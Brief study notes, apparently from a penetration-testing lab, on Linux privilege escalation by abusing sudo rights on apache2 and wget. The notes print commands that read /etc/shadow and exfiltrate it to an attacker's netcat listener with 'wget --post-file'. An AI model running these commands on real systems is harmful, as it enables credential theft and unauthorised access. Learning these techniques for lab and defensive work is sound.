sudo -l
GTFOBins doesn’t have apache examples. What can we do?
Google:
sudo apache2 privilege escalationwe find this source:
Abusing SUDO (Linux Privilege Escalation) - Touhid's Blog (touhidshaikh.com)
and we find that we can’t get shell and can’t edit system files but can view the system files:
sudo apache2 -f /etc/shadow
Most creative way he’s seen:
wget sudo perms. How does he use it?
He sent himself the shadow file over a server (wget has export functionality not just download):
On Kali:
nc -nvlp 8081On victim:
sudo wget --post-file=/etc/shadow 10.10.14.12:8081that IP is Kali’s IP